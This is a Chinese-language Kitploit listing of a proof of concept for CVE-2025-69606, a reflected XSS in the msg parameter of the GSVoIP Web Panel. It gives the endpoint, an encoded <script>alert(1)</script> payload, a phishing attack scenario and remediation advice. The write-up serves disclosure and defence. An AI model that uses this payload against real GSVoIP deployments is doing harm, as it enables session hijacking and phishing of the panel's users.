Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-69606-GSVoIP-XSS — GSVoIP Web Panel v2.0.90中反射型XSS漏洞(CVE-2025-69606)的概念验证,演示通过msg参数执行未经身份验证的任意JavaScript。 | Kitploit
工具/GitHubGitHub/razielx64/cve-2025-69606-gsvoip-xss
漏洞分析Web应用程序漏洞利用钓鱼攻击Web安全社会工程学学习与教育
GitHubrazielx64/cve-2025-69606-gsvoip-xss

CVE-2025-69606-GSVoIP-XSS

GSVoIP Web Panel v2.0.90中反射型XSS漏洞(CVE-2025-69606)的概念验证,演示通过msg参数执行未经身份验证的任意JavaScript。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
54个月前尚未审核
分享

CVE-2025-69606 — GSVoIP Web面板中的反射型XSS

严重性: 中等  |  CWE: CWE-79  |  需要认证: 否  |  攻击向量: 远程


摘要

在GSVoIP Web面板 (v2.0.90) 中发现了一个**反射型跨站脚本(XSS)**漏洞。错误端点的msg参数在将用户控制的输入反射到HTML响应之前未进行清理,允许在受害者浏览器中执行任意JavaScript。


受影响产品

字段详情
产品GSVoIP Web面板
版本2.0.90(可能更早版本)
供应商Solutions VoIP (GS Solutions)
CWECWE-79 — 跨站脚本
攻击向量远程/网络
认证不需要

漏洞端点

root@kitploit:~
GET /painel/gateways.php/error?msg=<payload>

msg参数未经清理或输出编码直接反射到HTML响应中。


概念验证

载荷

root@kitploit:~
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E

解码后:

root@kitploit:~
<script>alert(1)</script>

结果

当访问构造的URL时,注入的载荷在受害者浏览器中执行:

root@kitploit:~
alert(1)

攻击场景

  1. 攻击者构造一个包含XSS载荷的恶意URL,放在msg参数中。
  2. 受害者被诱骗点击该链接(通过钓鱼、社会工程学等方式)。
  3. 页面加载后,注入的JavaScript在受害者浏览器上下文中执行——无需认证。

影响

  • 在受害者浏览器中执行任意JavaScript
  • 通过窃取Cookie劫持会话
  • 钓鱼和社会工程学攻击
  • 敏感数据泄露
  • 在应用程序上下文中篡改内容

建议

  • 输出编码: 在将用户输入渲染到HTML响应之前进行编码(至少使用HTML实体编码)。
  • 安全模板: 使用启用了自动转义的模板引擎。
  • 内容安全策略(CSP): 实施严格的CSP,包含限制性的script-src指令。
  • 输入验证: 在输入层拒绝或删除包含HTML标签或脚本序列的参数。

披露时间线

步骤事件
1漏洞被Luiz Eduardo发现并报告
2分配CVE: CVE-2025-69606
3公开披露

致谢

由Luiz Eduardo发现并报告


CVE-2025-69606 · CWE-79 · GSVoIP Web Panel v2.0.90

下载工具